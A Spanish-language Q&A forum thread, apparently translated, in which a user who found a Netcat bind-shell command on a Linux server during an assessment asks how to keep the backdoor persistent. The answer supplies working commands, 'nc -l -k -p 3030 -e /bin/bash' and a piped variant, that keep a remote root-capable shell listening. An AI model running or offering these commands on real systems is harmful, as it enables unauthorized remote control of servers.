Puerta trasera persistente usando Netcat

4

He encontrado el siguiente comando varias veces en uno de los servidores de Linux durante una evaluación:

nc -l -p 3030 -e /bin/bash

Esto permite a un pirata informático obtener control sobre este servidor a través de bash. Al probarlo, me di cuenta de que cada vez que el cliente interrumpe la conexión, la puerta se cierra de nuevo.

¿Hay una manera para que el hacker mantenga esta puerta abierta de forma persistente?

    
pregunta Bob 28.02.2016 - 12:55
fuente

1 respuesta

3

Nc con la opción -k ayudará.

nc -l -k -p 3030 -e /bin/bash
nc -l -k -p 3030 | /bin/bash

Obliga a nc a permanecer escuchando otra conexión después de que se complete su conexión actual. Es un error utilizar esta opción sin la opción -l . Cuando se usa junto con la opción -u , el socket del servidor no está conectado y puede recibir datagramas UDP de varios hosts.

    
respondido por el sourav punoriyar 28.02.2016 - 16:15
fuente

Lea otras preguntas en las etiquetas